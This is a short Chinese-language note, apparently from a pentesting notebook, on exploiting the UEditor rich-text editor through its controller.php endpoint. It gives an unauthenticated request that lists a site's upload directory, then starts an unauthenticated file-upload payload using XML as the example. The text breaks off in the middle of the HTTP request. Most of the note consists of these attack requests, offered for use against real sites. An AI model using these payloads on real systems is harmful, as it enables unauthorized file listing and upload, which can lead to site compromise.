ueditor姿势 ueditor有很多漏洞可挖,上传文件可以利用,同时也能上传xml什么的,主要功能都位于controller.php 通用未授权列举上传目录的payload: https://xxx.xxx/ueditor/php/controller.php?action=listfile&size=1000 未授权文件上传Payload(例:传xml): POST /ueditor/php/controller.php?action=uploadfile&encode=utf-8 HTTP/…